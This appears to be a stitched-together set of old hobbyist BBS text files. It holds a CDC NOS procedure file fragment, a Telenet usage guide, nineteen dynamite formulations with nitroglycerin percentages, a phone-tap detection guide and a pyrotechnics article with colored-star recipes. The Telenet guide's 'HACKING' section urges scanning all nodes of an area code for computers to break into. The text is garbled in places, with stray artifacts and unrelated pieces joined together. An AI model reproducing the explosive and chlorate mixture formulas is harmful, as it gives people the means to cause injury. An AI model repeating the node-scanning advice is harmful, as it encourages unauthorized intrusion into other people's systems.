  1472. $GET(QQQFILE=ENQF/UN=1GTL0CL)
  1473. QQQFILE.
  1474. $REVERT,NOLIST.
  1475. $EXIT.
  1476. $REVERT. FILES ERROR
  1477. #EOR
  1478. .PROC,RL.
  1479. .******RAISE LIMITS******
  1480. $SETASL(*)
  1481. $SETJSL(*)
  1482. $SETTL(*)
  1483. $CSET(ASCII)
  1484. $NOTE./ Limits now at max validated levels.
  1485. $CSET(NORMAL)
  1486. $REVERT,NOLIST.
  1487. #EOR
  1488. .PROC,CL.
  1489. .******CLEAR******
  1490. $CLEAR,*.
  1491. $CSET(ASCII)
  1492. $NOTE./LOCAL FILE AREA CLEARED
  1493. $REVERT,NOLIST.
  1494. #EOR
  1495. .PROC,P,FILE=THING,LST=LIST.
  1496. .***********************************************************
  1497. $CLEAR.
  1498. $GET(FILE)
  1499. $PASCAL4,FILE,LST.
  1500. $REVERT.
  1501. $EXIT.
  1502. $REWIND,*.
  1503. $CSET(ASCII)
  1504. $COPY(LIST)
  1505. $CSET(NORMAL)
  1506. $REVERT,NOLIST.
  1507. #EOR
  1508. .PROC,RE.
  1509. .******REWIND******
  1510. $REWIND,*.  _7+3 _$CSET(ASCII)
  1511. $NOTE./REWOUND.
  1512. $REVERT,NOLIST.
  1513. #EOR
  1514. .PROC,FOR,FILE,LST=LIST.
  1515. .********************************************************************
  1516. $CLEAR.
  1517. $GET(FILE)
  1518. $FTN5,I=FILE,L=LST.
  1519. $REPLACE(LST=L)
  1520. $CSET(ASCII)
  1521. $REVERT. Fortran Compiled
  1522. $EXIT.
  1523. $REWIND,*.
  1524. $COPY(LST)
  1525. $REVERT. That's all folks.
  1526. #EOR
  1527. .PROC,WAR.
  1528. .******WARBLES******
  1529. $SACFIND,AID,WAR.
  1530. $REVERT,NOLIST.
  1531. #EOR
  1532. .PROC,M.
  1533. .******MAIL/CHECK******
  1534. $MAIL/CHECK.
  1535. $REVERT,NOLIST.
  1536. #EOR
  1537. .PROC,MA.
  1538. .******ENTER MAIL******
  1539. $MAIL.
  1540. $REVERT,NOLIST.
  1541. #EOR
  1542. .PROC,HE,FILE=SUMPROC,UN=.
  1543. .******HELP FILE******
  1544. $GET,FILE/#UN=UN.
  1545. $COPY(FILE)
  1546. $REVERT.
  1547. $EXIT.
  1548. $REVERT,NOLIST.
  1549. #EOR
  1550. .PROC,DYNAMO.
  1551. .******WHO KNOWS??******
  1552. $GET,DYNMEXP/UN=7ETPDOC.
  1553. $SKIPR,DYNMEXP.
  1554. $COPYBR,DYNMEXP,GO.
  1555. $FIND,DYNAMO,GO.
  1556. $REVERT,NOLIST.
  1557. #EOR
  1558. #EOR
  1559. #EOI
  1560.  
  1561.  
  1562.  
  1563.                  The Basics of TELENET
  1564.                      Part I
  1565.  
  1566.   This Bulletin is the first in a series to cover the general procedures of the
  1567. major data networks:
  1568.  
  1569. Telenet
  1570. Tymnet
  1571. Autonet
  1572. Arpanet
  1573. [More to be added]
  1574.  
  1575.  
  1576.                    BACKGROUND  _7+3 _                                   ----------
  1577.   Telenet connects many large computers to itself through dedicated telephone
  1578. lines, each of these 'host computers' is assigned a node address(ie.:NPAxx).
  1579. Telenet is an international data network, connecting to computers around the
  1580. world.See the International telenet bulletin for more on this.
  1581.  
  1582.                    CONNECTING
  1583.                    ----------
  1584.   Telenet is probably the most 'user friendly' network of the four listed.  A
  1585. normal logon looks like this:  [NPA=Area code,xx=node address] You hit <CR>
  1586. <CR> [2 Returns] Telenet respnds with:TELENET NPAxx
  1587.  
  1588. TERMINAL=(Here you type your terminal identifier) (See the bulletin section for
  1589.        the list)
  1590.  
  1591.          @
  1592.  
  1593.   The '@' is Telenet's promt to you to go ahead.
  1594.  
  1595.                 Things to do on telenet
  1596.                 -----------------------
  1597.   To connect to a node type:
  1598.             @C NPAxx
  1599.   Telenet will atempt to connect to the computer at the node given.
  1600.   A few of the things that Telenet will say are:
  1601.  
  1602.  
  1603. NPAxx CONNECTED (You are connected to a computer)
  1604. ILLEGAL ADDRESS (Not a working node)
  1605. NPAxx NOT REACHABLE   (The computer at that node is 'DOWN')
  1606. NPAxx REFUSED  COLLECT CONNECTION(Needs a paid ID [More later]
  1607. NPAxx REJECTING (Computer is 'UP' but not available)
  1608. NPAxx NOT RESPONDING (The computer at that node is 'DOWN')
  1609.  
  1610.   These are most of the things that Telenet will tell you
  1611.  
  1612.                    MORE THINGS TO DO
  1613.                    -----------------
  1614.   Typing an @ while in a host computer will return you to Telenet You will
  1615. still be connected to the other computer, you may:  D (to disconnect from that
  1616. computer) or TAPE (Unknown, possibly records your actions so that) (you may
  1617. look at them later)
  1618.  
  1619.   If you type either of the above, while not connected to a node telenet will
  1620. respond with NOT CONNECTED
  1621.  
  1622.                      MISC.
  1623.                      -----
  1624. RESET (Returns Telenet to the beggining,you must start again (with the
  1625.       <CR><CR>)
  1626.  
  1627. SET (Unknown)
  1628.  
  1629. MAIL (To connect to GTE Telemail) It will ask for User?  and Password?
  1630.   _7+3 _
  1631.                      NOTES
  1632.                      -----
  1633.  
  1634.   In addition to the normal area codes in NPAxx there are also other NPA's used
  1635. in Telenet, 909 and 311, for instance.
  1636.  
  1637.   Telenet hangs up after three disconnections from host computers, this
  1638. unfortunately is quite a PAIN in the ___ There is no way to get around this as
  1639. far as I can tell.
  1640.  
  1641.   The ID command in Telenet is to Identify users to the host computers.  You
  1642. must type ID (your ID#) (your password).  If you just type ID, telenet will
  1643. tell you that your ID is cleared, which means nothing.  To recieve a paid user
  1644. ID on telenet call them at:  Telenet customer service:800-336-0437 800-572-
  1645. 0408(In Virginia)
  1646.  
  1647.  
  1648.                     HACKING
  1649.                     -------
  1650.   Telenet is very convinient for hackers as it connects many computers to your
  1651. terminal, without having to find and dial many numbers.  Start your Telehacking
  1652. by picking an areacode and then trying all the nodes in that NPA.  You will no
  1653. doubt find many interesting computers 'to work on'.
  1654.  
  1655.    Here are instructions for using TELENET.  There are some very basic things,
  1656. which most people already know, and some other things, which even the most
  1657. dedicated hackers have probably never even heard of.  This includes things such
  1658. as international access, etc.  Well, have fun.
  1659.  
  1660.  
  1661.             THE TELENET CONNECTION
  1662.       INTERNATIONAL ADDRESSING/INTERNATIONAL ACCESS PROCEDURES
  1663.  
  1664.  
  1665. I.  TELENET INTERNATIONAL ADDRESS FORMAT
  1666.  
  1667.     ---------------------------- Data Network
  1668.     |                       Identification Code (DNIC)
  1669.     |
  1670.     |
  1671.     |
  1672.     |      ------------------- Area Code
  1673.     |      |
  1674.     |      |
  1675.     |      |    ------------- DTE Address
  1676.     |      |    |
  1677.     |      |    |      ----- Port Address
  1678.     |      |    |      |
  1679.     |      |    |      |
  1680.   DDDD    AAA  HHHHH   PP
  1681.                |
  1682.                ----- Optional Subaddress
  1683.                 Field for Packet Mode DTE
  1684.   _7+3 _
  1685. Example:  Telenet        International
  1686.     -------         -------------
  1687.     212 141         3110 21200141
  1688.     909  84         3110 90900084
  1689.  
  1690.  
  1691.  
  1692. II.   ACCESS TO OVERSEAS PUBLIC DATA NETWORKS
  1693.  
  1694. 1.  Turn on the terminal and coupler.
  1695. 2.  Dial the nearest Telenet access number (See Telenet Public Dial listing).
  1696.     When you hear a high-pitched tone, place the telephone
  1697.     receiver in the coupler.
  1698.  
  1699.      For Data Sets (Bell 103 or 113 type), depress the data button.
  1700.  
  1701. 3.  Type Two carriage returns (CR).
  1702. 4.  Telenet will give you a port identification number and ask you
  1703.     to identify your terminal type in the two or four
  1704.     character id for your terminal followed by a carriage
  1705.     return (CR) or type carriage return (CR).
  1706.  
  1707.       (EX.)   TELENET
  1708.          202 DL9
  1709.          TERMINAL = AJ63(CR)
  1710.  
  1711. 5.  After Telenet prompts with a '@' type 'ID', skip a space (SP)
  1712.     and type your password followed by a carriage return.  (Contact
  1713.     your GTE Telenet Representative to obtain a required caller
  1714.     paid ID.)
  1715.  
  1716.       (EX.)   @ID(SP);INTL(CR)
  1717.  
  1718.     Type in your password.
  1719.  
  1720.       (EX.)   PASSWORD = 123456(CR)
  1721.  
  1722. 6.  After Telenet prompts with an @, type a C. skip a space and
  1723.     type the network address of the computer you wish to access,
  1724.     followed by a carriage return (CR).
  1725.  
  1726.       (EX.)   @C(SP)023411234567890(CR)
  1727.  
  1728.     Note:  Your International address will follow a format such as:
  1729.  
  1730.      020801234567890 for France/Transpac
  1731.      023421234567890 for United Kingdom/British Telecom
  1732.      026241234567890 for Germany/Datex-P
  1733.  
  1734. 7.  Telenet will respond with a connection message.  You are now
  1735.     ready to begin your conversation with the host computer.
  1736.  
  1737.       (EX.)   (ADDRESS)CONNECTED
  1738.   _7+3 _8.  To disconnect from your computer, log off as usual.  Telenet
  1739.     will send you a disconnected message.
  1740.  
  1741.       (EX.)   (ADDRESS)DISCONNECTED
  1742.  
  1743.     Hang up to disconnect from Telenet.
  1744.  
  1745. (CR) = Carriage return
  1746. (SP) = Space
  1747.  
  1748.  
  1749.  
  1750.                    Dynamite
  1751.  
  1752.      Dynamite is nothing more than just nitroglycerin and a stablizing agent
  1753. to make it much safer to use.  For the sake of saving time, I will abbreviate
  1754. nitroglycerin with a plain NG.  The numbers are percentages, be sure to mix
  1755. these carefully and be sure to use the exact amounts.  These percentages are
  1756. in weight ratio, not volume.
  1757.  
  1758. no.  ingredients                 amount
  1759. ---------------------------------------
  1760. #1   NG                          32
  1761.      sodium nitrate              28
  1762.      woodmeal                    10
  1763.      ammonium oxalate            29
  1764.      guncotten                    1
  1765.  
  1766. #2   NG                          24
  1767.      potassium nitrate            9
  1768.      sodium nitate               56
  1769.      woodmeal                     9
  1770.      ammonium oxalate             2
  1771.  
  1772. #3   NG                          35.5
  1773.      potassium nitrate           44.5
  1774.      woodmeal                     6
  1775.      guncotton                    2.5
  1776.      vaseline                     5.5
  1777.      powdered charcoal            6
  1778.  
  1779. #4   NG                          25
  1780.      potassium nitrate           26
  1781.      woodmeal                    34
  1782.      barium nitrate               5
  1783.      starch                      10
  1784.  
  1785. #5   NG                          57
  1786.      potassium nitrate           19
  1787.      woodmeal                     9
  1788.      ammonium oxalate            12
  1789.      guncotton                    3
  1790.  
  1791. #6   NG                          18
  1792.      sodium nitrate              70  _7+3 _     woodmeal                     5.5
  1793.      potassium chloride           4.5
  1794.      chalk                        2
  1795.  
  1796. #7   NG                          26
  1797.      woodmeal                    40
  1798.      barium nitrate              32
  1799.      sodium carbonate             2
  1800.  
  1801. #8   NG                          44
  1802.      woodmeal                    12
  1803.      anhydrous sodium sulfate    44
  1804.  
  1805. #9   NG                          24
  1806.      potassium nitrate           32.5
  1807.      woodmeal                    33.5
  1808.      ammonium oxalate            10
  1809.  
  1810. #10  NG                          26
  1811.      potassium nitrate           33
  1812.      woodmeal                    41
  1813.  
  1814. #11  NG                          15
  1815.      sodium nitrate              62.9
  1816.      woodmeal                    21.2
  1817.      sodium carbonate              .9
  1818.  
  1819. #12  NG                          35
  1820.      sodium nitrate              27
  1821.      woodmeal                    10
  1822.      ammonium oxalate             1
  1823.  
  1824. #13  NG                          32
  1825.      potassium nitrate           27
  1826.      woodmeal                    10
  1827.      ammonium oxalate            30
  1828.      guncotton                    1
  1829.  
  1830. #14  NG                          33
  1831.      woodmeal                    10.3
  1832.      ammonium oxalate            29
  1833.      guncotton                     .7
  1834.      potassium perchloride       27
  1835.  
  1836. #15  NG                          40
  1837.      sodium nitrate              45
  1838.      woodmeal                    15
  1839.  
  1840. #16  NG                          47
  1841.      starch                      50
  1842.      guncotton                    3
  1843.  
  1844. #17  NG                          30
  1845.      sodium nitrate              22.3
  1846.      woodmeal                    40.5  _7+3 _     potassium chloride           7.2
  1847.  
  1848. #18  NG                          50
  1849.      sodium nitrate              32.6
  1850.      woodmeal                    17
  1851.      ammonium oxalate              .4
  1852.  
  1853. #19  NG                          23
  1854.      potassium nitrate           27.5
  1855.      woodmeal                    37
  1856.      ammonium oxalate             8
  1857.      barium nitrate               4
  1858.      calcium carbonate             .5
  1859.  
  1860.  
  1861.  
  1862.  
  1863.              BUG DETECTION ON HOME PHONES
  1864.  
  1865.   FIRST OF ALL TO TEST FOR BUGS, YOU NEED A VOM (MULTIMETER) THE HIGHER THE
  1866. IMPEDANCE THE BETTER (A DIGITAL WITH FET CIRCUITRY OR A VACUUM TUBE VOLT METER
  1867. IS THE BEST).
  1868.  
  1869.   FIRST DISCONNECT THE PHONE LINE(S) AT BOTH ENDS.  UNDO THE PHONE INSTRUMENT
  1870. AND HOOK IT UP TO THE ENTRY POINT OF THE PHONE LINE FROM THE OUTSIDE WORLD (MA
  1871. BELL DOES NOT LIKE YOU CUT HER OFF COMPLETELY.)  THE SCHEME IS THE PHYSICALLY
  1872. ISOLATE YOUR HOUSE, APARTMENT, ETC. FROM THE OUTSIDE WORLD.  BUT BEFORE YOU DO
  1873. THIS MEASURE THE LINE VOLTAGE (IT SHOULD BE APPROXIMATELY 48 VOLTS).
  1874.  
  1875.   NOW WITH THE WIRES DISCONNECTED AT BOTH ENDS, SET YOUR RESISTANCE SCALE TO A
  1876. HIGH READING AND MEASURE THE RESISTANCE OF THE PHONE LINE, IT SHOULD BE VERY
  1877. HIGH ON THE ORDER OF MILLION OHMS OR MORE, THIS IS THE NORMAL CONDITION, SINCE
  1878. YOU ARE MEASURING THE RESISTANCE OF AN OPEN CIRCUIT.  IF IT IS MUCH LESS, SAY
  1879. 50-100KOHMS THEN YOU A DEVICE ON THE LINE THAT DOES NOT BELONG THERE, PROBABLY
  1880. A PARALLEL BUG.
  1881.  
  1882.   NOW TWIST THE END OF THE DISCONNECTED WIRE AND GO TO THE OTHER END AND
  1883. MEASURE THE RESISTANCE OF THIS.  THIS RESISTANCE SHOULD BE ABOUT ONE OHM OR
  1884. TWO AT THE MOST IN A BIG HOUSE WITH A LOT OF PHONES.  IF IT IS MORE, THEN YOU
  1885. PROBABLY HAVE A SERIES BUG.
  1886.  
  1887.   IF IN THE FIRST CASE, TAKING PARALLEL MEASUREMENTS USING A METER (NOT
  1888. LEDLLCD) AND YOU NOTICE A "KICK" IN THE NEEDLE, YOU PROBABLY HAVE A LINE TAP.
  1889.  
  1890.   NOW IF YOU ALSO MAKE A MEASUREMENT WITH THE WIRE END TWISTED TOGETHER AND
  1891. YOU NOTICE THE RESISTANCE READS ABOUT 1-2KOHMS, THEN YOU MAY HAVE A DROP-OUT
  1892. RELAY. A DROP-OUT RELAY IS A RELAY THAT SENSES A PHONE GOING OFF HOOK, AND
  1893. SIGNALS A TAPE RECORDER TO START RECORDING.
  1894.  
  1895.   ANOTHER TEST TO DO WITH THE PHONES STILL HOOKED UP TO THE OUTSIDE WORLD, ON
  1896. HOOK VOLTAGE IS ABOUT 48 VOLTS AND OFF HOOK IS ABOUT 6-10 VOLTS.  ANY OTHER
  1897. CONDITIONS MAY MEAN TELEPHONE SURVEILLANCE.
  1898.  
  1899.   IF YOU USE A WIDE RANGE AUDIO FREQUENCY GENERATOR AND CALL YOUR HOUSE,
  1900. APARTMENT, ETC. FROM ANOTHER PHONE AND SWEEP UP AND DOWN THE SPECTRUM, AND YOU  _7+3 _NOTICE THE PHONE ANSWERS ITSELF SOMEWHERE IN THE SWEEP YOU PROBABLY HAVE AN
  1901. INFINITY TRANSMITTER ON YOUR LINE.
  1902.  
  1903.  
  1904.  
  1905.  
  1906.                Stars, Flares, and Color Mixtures
  1907.  
  1908.   We will be using the following materials this time. Get familiar with them.
  1909. Some can be highly dangerous.
  1910.  
  1911.  
  1912. Aluminum Dust (and powder)   Al
  1913.  
  1914. An element used for brilliancy in the fine powder form. It can be purchased as
  1915. a fine silvery or gray powder. All grades from technical to superpure (99.9%)
  1916. can be used. It is dangerous to inhale the dust. The dust is also flammable, by
  1917. itself. In coarser forms, like powder, it is less dangerous.
  1918.  
  1919. Antimony Sulfide Sb S
  1920.            2 3
  1921. Also known as "Black" Antimony Sulfide. (There is also a "Red" form, which is
  1922. useless to us.) This is used to sharpen the report of firecrackers, salutes,
  1923. etc, or to add color to a fire. The technical, black, powder is suitable. Avoid
  1924. contact with the skin. Dermatitis or worse will be the result.
  1925.  
  1926. Barium Chlorate   Ba(ClO ) * H O
  1927.             3 2   2
  1928. Available as a white powder. It is poisonous, as are all Barium salts. It is
  1929. used both as an oxidizer and color imparter. It is as powerful as Potassium
  1930. Chlorate and should be handled with the same care. Melting point is 414
  1931. degrees.
  1932.  
  1933. Barium Nitrate  Ba(NO )
  1934.              3 2
  1935. Poisonous. Used as an oxidizer and colorizer. The uses and precautions are the
  1936. same as with a mixture containing Potassium Nitrate.
  1937.  
  1938. Charcoal  C
  1939.  
  1940. A form of the element carbon. Used in fireworks and explosives as a reducing
  1941. agent. It can be purchased as a dust on up to a coarse powder. Use dust form,
  1942. unless otherwise specified. The softwood variety is best, and it should be
  1943. black, not brown.
  1944.  
  1945. Copper Acetoarsenite   (CuO) As O Cu(C H O )
  1946.                 3  2 3    2 3 2 2
  1947. The popular name for this is Paris Green. It is also called King's Green or
  1948. Vienna Green. It has been used as an insecticide, and is available as a
  1949. technical grade, poisonous, emerald green powder. It is used in fireworks to
  1950. add color. Careful with this stuff. It contains arsenic.
  1951.  
  1952. Copper Chloride   CuCl
  1953.               2
  1954. A color imparter. As with all copper salts, this is poisonous.  _7+3 _
  1955. Copper Sulfate   CuSO *5H O
  1956.              4   2
  1957. Known as Blue Vitriol, this poisonous compound is available as blue crystals or
  1958. blue powder. Can be purchased in some drugstores and some agricultural supply
  1959. stores. Used as a colorizer.
  1960.  
  1961. Dextrine
  1962. This can be purchased as a white or yellow powder. It is a good cheap glue for
  1963. binding cases and stars in fireworks.
  1964.  
  1965. Lampblack   C
  1966.  
  1967. This is another form of the element carbon. It is a very finely powdered black
  1968. dust (soot, actually) resulting from the burning of crude oils. It is used for
  1969. special effects in fireworks.
  1970.  
  1971. Lead Chloride  PbCl
  1972.            3
  1973. Available as a white, crystalline, poisonous powder, which melts at 501
  1974. degrees. As with all lead salts, it is not only poisonous, but the poison
  1975. accumulates in the body, so a lot of small, otherwise harmless doses can be as
  1976. bad as one large dose.
  1977.  
  1978. Mercurous Chloride  HgCl
  1979.  
  1980. Also known as calomel or Mercury Monochloride. This powder will brighten an
  1981. otherwise dull colored mixture. Sometimes it is replaced by Hexachlorobenzene
  1982. for the same purpose. This is non poisonous ONLY if it is 100% pure. Never
  1983. confuse this chemical with Mercuric Chloride, which is poisonous in any purity.
  1984.  
  1985. Potassium Chlorate  KClO
  1986.             3
  1987. This, perhaps, is the most widely used chemical in fireworks. Before it was
  1988. known, mixtures were never spectacular in performance. It opened the door to
  1989. what fireworks are today. It is a poisonous, white powder that is used as an
  1990. oxidizer. Never ram or strike a mixture containing Potassium Chlorate. Do not
  1991. store mixtures containing this chemical for any length of time, as they may
  1992. explode spontaneously.
  1993.  
  1994. Potassium Dichromate   K Cr O
  1995.             2  2 7
  1996. Also known as Potassium Bichromate. The commercial grade is used in fireworks
  1997. and matches. The bright orange crystals are poisonous.
  1998.  
  1999. Potassium Nitrate   KNO
  2000.                3
  2001. Commonly called Saltpeter. This chemical is an oxidizer which decomposes at 400
  2002. degrees. It is well known as a component of gunpowder and is also used in other
  2003. firework pieces. Available as a white powder.
  2004.  
  2005. Potassium Perchlorate   KClO
  2006.                 4
  2007. Much more stable than its chlorate brother, this chemical is a white or
  2008. slightly pink powder. It can often substitute for Potassium Chlorate to make  _7+3 _the mixture safer. It will not yield its oxygen as easily, but to make up for
  2009. this, it gives off more oxygen. It is also poisonous.
  2010.  
  2011. Red Gum
  2012.  
  2013. Rosin similar to shellac and can often replace it in many fireworks formulas.
  2014. Red Gum is obtained from barks of trees.
  2015.  
  2016. Shellac Powder
  2017.  
  2018. An organic rosin made from the secretions of insects which live in India. The
  2019. exact effect it produces in fireworks is not obtainable from other gums. The
  2020. common mixture of shellac and alcohol sold in hardware stores should be
  2021. avoided. Purchase the powdered variety, which is orange in color.
  2022.  
  2023. Sodium Oxalate  Na C O
  2024.           2 2 4
  2025. Used in making yellow fires. Available as a fine dust, which you should avoid
  2026. breathing.
  2027.  
  2028. Strontium Carbonate   SrCO
  2029.               3
  2030. Known in the natural state as Strontianite, this chemical is used for adding a
  2031. red color to fires. It comes as a white powder, in a pure, technical, or
  2032. natural state.
  2033.  
  2034. Strontium Nitrate   Sr(NO )
  2035.              3 2
  2036. By far the most common chemical used to produce red in flares, stars and fires.
  2037. Available in the technical grade as a white powder. It does double duty as an
  2038. oxidizer, but has a disadvantage in that it will absorb some water from the
  2039. air.
  2040.  
  2041. Strontium Sulfate   SrSO
  2042.             4
  2043. Since this chemical does not absorb water as readily as the nitrate, it is
  2044. often used when the powder is to be stored. In its natural state it is known as
  2045. Celestine, which is comparable to the technical grade used in fireworks.
  2046.  
  2047. Sulfur   S
  2048.  
  2049. A yellow element that acts as a reducing agent. It burns at 250 degrees, giving
  2050. off choking fumes. Purchase the yellow, finely powdered form only. Other forms
  2051. are useless without a lot of extra and otherwise unnecessary effort to powder
  2052. it.
  2053.  
  2054. Zinc Dust   Zn
  2055.  
  2056. Of all the forms of zinc available, only the dust form is in any way suitable.
  2057. As a dust, it has the fineness of flour. Should be either of the technical or
  2058. high purity grade. Avoid breathing the dust, which can cause lung damage. Used
  2059. in certain star mixtures, and with sulfur, as a rocket fuel.
  2060.  
  2061.  
  2062.    
  2063. \                         The Chemistry of Pyrotechnics
  2064.  
  2065. Most pyrotechnic mixtures follow a very simple set of chemical rules. We'll go
  2066. over those now. Most mixtures contain an oxidizing agent, which usually
  2067. produces oxygen used to burn the mixture, and a reducing agent, which burns to
  2068. produce hot gasses. In addition, there can be coloring agents to impart a color
  2069. to the fire, binders, which hold the mixture in a solid lump, and regulators
  2070. that speed up or slow down the speed at which the mixture burns. These are not
  2071. all the possibilities, but they cover most all cases.
  2072.  
  2073. Oxidizing agents, such as nitrates, chlorates, and perchlorates provide the
  2074. oxygen. They usually consist of a metal ion and the actual oxidizing radical.
  2075. For example, Potassium Nitrate contains a metal ion (Potassium) and the
  2076. oxidizing radical (the Nitrate). Instead of potassium, we could instead
  2077. substitute other metals, like sodium, barium, or strontium, and the chemical
  2078. would still supply oxygen to the burning mixture. But some are less desirable.
  2079. Sodium Nitrate, for example, will absorb moisture out of the air, and this will
  2080. make it harder to control the speed at which the mixture will burn.
  2081.  
  2082. In the following examples, we'll use the letter "X" to show the presence of a
  2083. generic metal ion.
  2084.  
  2085. Note that Nitrates are stingy with the oxygen that they give up. They only give
  2086. one third of what they have.
  2087.  
  2088.     Some        Some
  2089.    Nitrate     Nitrite  Oxygen
  2090.  
  2091.      2XNO  ---> 2XN0    +  O
  2092.      3          2       2
  2093.  
  2094. Chlorates are very generous, on the other hand. They give up all the oxygen
  2095. they have. Furthermore, they give it up more easily. It takes less heat, or
  2096. less shock to get that oxygen loose. Mixtures using chlorates burn more
  2097. spectacularly, because a smaller volume of the mix needs to be wasted on the
  2098. oxidizer, and the ease with which the oxygen is supplied makes it burn faster.
  2099. But the mixture is also MUCH more sensitive to shock.
  2100.  
  2101.      Some           Some
  2102.    Chlorate       Chloride     Oxygen
  2103.  
  2104.      2XClO   --->   2XCl     +   3O
  2105.       3                        2
  2106.  
  2107. Perchlorates round out our usual set of oxidizing tools. Perchlorates contain
  2108. even more oxygen than Chlorates, and also give it all up. However, they are not
  2109. as sensitive as the Chlorates, so they make mixtures that are "safer". That is,
  2110. they're less likely to explode if you drop or strike them.
  2111.  
  2112.      Some          Some
  2113.   Perchlorate    Chloride     Oxygen
  2114.  
  2115.      XClO   --->   XCl     +    2O
  2116.      4                        2
  2117.   _7+3 _
  2118. Reducing agents, like sulfur and charcoal (carbon) simply burn the oxygen to
  2119. produce sulfur dioxide and carbon dioxide. It's usually best to include a
  2120. mixture of the two in a pyrotechnic mixture, as they burn at different speeds
  2121. and temperatures, and the proper combination will help control the speed of
  2122. combustion. Also, when extra fast burning speed is needed, like in rockets and
  2123. firecrackers, metal powder is often added. The finer the powder, the faster the
  2124. burning rate. The proportions change the speed, as well. Magnesium powder or
  2125. dust is often used for speed. Aluminum dust works, but not as well. Zinc dust
  2126. is used in some cases. Powdered metal, (not dust) particularly aluminum or
  2127. iron, are often used to produce a mixtire that shoots out sparks as it burns.
  2128. In rare cases, it is desirable to slow down the burning speed. In this case,
  2129. corn meal is often used. It burns, so acts as a reducing agent, but it doesn't
  2130. burn very well.
  2131.  
  2132.  
  2133. Coloring agents are very interesting. It's long been known that various metals
  2134. produce different colored flames when burned in a fire. The reasons are buried
  2135. in the realm of quantum physics, but the results are what matters, and we can
  2136. present them here. Note that if we use an oxidizing agent that contains a
  2137. colorizing metal, it can do a double job. It can produce oxygen and color.
  2138.  
  2139. Barium     -Barium salts give a pleasant green color. Barium Nitrate is most
  2140.         often used.
  2141. Strontium  -Strontium salts give a strong red color. Strontium Nitrate is a
  2142.         very convenient material for red.
  2143. Sodium     -Sodium salts give an intense yellow color. So intense in fact that
  2144.         any sodium compounds in a mixture will usually wash out other
  2145.         colorizers. As has been said, Sodium Nitrate absorbs moisture from
  2146.         the air, and so is not really suitable to impart color. Instead,
  2147.         Sodium Oxalate is usually used. This does not absorb lots of water,
  2148.         but has the disadvantage of being very poisonous.
  2149. Copper     -Copper salts are used to give a blue color. Blue is the most
  2150.         difficult color to produce, and it's usually not too spectacular.
  2151.         Usually Copper Acetoarsenite (Paris Green) is used. This compound
  2152.         contains arsenic, and is very poisonous. Since it still doesn't
  2153.         produce a very memorable blue, it's often used with mercurous
  2154.         chloride, which enhances the color, but is also poisonous, and
  2155.         expensive, to boot.
  2156. Potassium  -Potassium salts will give a delicate purple color, if they'e very
  2157.         pure. The cheaper lab grades of potassium nitrate often contain
  2158.         traces of sodium, which completely obscure the purple color. In
  2159.         order to get the purple coloring, very pure grades must be used,
  2160.         and you must be very careful to mix it in very clean vessels, and
  2161.         scoop it from the supply jar with a very clean scoop. The color is
  2162.         certainly worth the effort, if you can get it.
  2163.  
  2164.  
  2165. Some mixtures that burn in colors also contain binders, that hold the mixture
  2166. together in a solid lump. These lumps are usually referred to as stars. The
  2167. balls fired from a roman candle or the colorful showers sprayed from aerial
  2168. bombs are examples of stars. Depending on the mixture, the binder is either a
  2169. starch called dextrine or finely powdered orange shellac. A shellac-like
  2170. material called red gum is also used on occasion. In some mixtures, the shellac
  2171. powder also helps produce a nice color. Shellac mixtures are moistened with  _7+3 _alcohol to get them to stick together. Dextrine mixtures are moistened with
  2172. water.
  2173.  
  2174. If the colored mixture is to be used as a flare, it's just packed into a thin
  2175. paper tube. If it's to be fired from a roman candle, it's usually extruded from
  2176. a heavy tube by pushing it out with a dowel, and the pieces are cut off as the
  2177. proper length pops out. Stars fired from an aerial bomb are usually made by
  2178. rolling the moist mixture flat, and cutting it with a knife into small cubes.
  2179. Stars that are extruded are often called "pumped stars" those that are rolled
  2180. out are "cut stars".
  2181.  
  2182. The following are formulas for mixtures that burn with various colors. Parts
  2183. are by weight.
  2184.  
  2185. Red
  2186.  
  2187. Potassium Chlorate    9
  2188. Lampblack             1
  2189. Strontium Nitrate     9
  2190. bind with shellac
  2191. dissolved in alcohol
  2192.  
  2193.  
  2194. Blue
  2195.  
  2196. Potassium Chlorate    9         This one is inferior
  2197. Copper Acetoarsenite  2         Potassium Chlorate    12
  2198. Mercurous Chloride    1         Copper Sulfate        6
  2199. Sulfur                2         Lead Chloride         1
  2200. bind with dextrine              Sulfur                4
  2201. in water                        bind with dextrin in water
  2202.  
  2203.  
  2204. Green
  2205.  
  2206. Barium Chlorate       8         Barium Nitrate        3
  2207. Lampblack             1         Potassium Chlorate    4
  2208. Shellac Powder        1         Shellac Powder        1
  2209. bind with alcohol               Dextrine              1/4
  2210.                 Bind with alcohol
  2211.  
  2212. Yellow
  2213.  
  2214. Potassium Chlorate    8         Potassium Chlorate    8
  2215. Sodium Oxalate        3         Sodium Oxalate        4
  2216. Lampblack             2         Shellac Powder        2
  2217. Bind with shellac in            Dextrine              1
  2218. alcohol or dextrine             Bind with alcohol
  2219. in water
  2220.  
  2221.  
  2222. White
  2223.  
  2224. Potassium Nitrate     6
  2225. Sulfur                1  _7+3 _Antimony Sulfide      2
  2226. bind with dextrine in
  2227. water
  2228.  
  2229.  
  2230. Orange
  2231.  
  2232. Strontium Nitrate     36
  2233. Sodium Oxalate        8
  2234. Potassium Chlorate    5
  2235. Shellac Powder        5
  2236. Sulfur                3
  2237. Bind with alcohol
  2238.  
  2239.  
  2240. Purple (ingredients must be very pure)
  2241.  
  2242. Potassium Chlorate    36        This one has more of a lilac color
  2243. Strontium Sulfate     10        Potassium Chlorate    38
  2244. Copper Sulfate        5         Strontium Carbonate   18
  2245. Lead Chloride         2         Copper Chloride       4
  2246. Charcoal              2         Lead Chloride         2
  2247. Sulfur                12        Sulfur                14
  2248. bind with dextrine in           bind with dextrine in water
  2249. water
  2250.  
  2251.  
  2252. Brilliant White
  2253.  
  2254. Potassium Perchlorate 12
  2255. Aluminum Dust         4
  2256. Dextrine              1
  2257. Bind with water
  2258.  
  2259.  
  2260. Golden Twinkler Stars - Falls through the air and burns in an on and off
  2261.   manner. The effect is spectacular. A pumped or cut star.
  2262.  
  2263. Potassium Nitrate     18
  2264. Sulfur                3
  2265. Lampblack             3
  2266. Aluminum Powder       3
  2267. Antimony Sulfide      3
  2268. Sodium Oxalate        4
  2269. Dextrine              2
  2270. Bind with water
  2271.  
  2272. Zinc Spreader Stars - Shoot out pieces of burning zinc and charcoal. These
  2273.   stars are much heavier than usual, and require larger charges if they're to
  2274.   be fired from a tube.
  2275.  
  2276. Zinc Dust             72
  2277. Potassium Chlorate    15
  2278. Potassium Dichromate  12
  2279. Granular Charcoal     12  _7+3 _Dextrine               2
  2280. bind with water
  2281.  
  2282. Electric Stars - Stars that contain aluminum powder
  2283.  
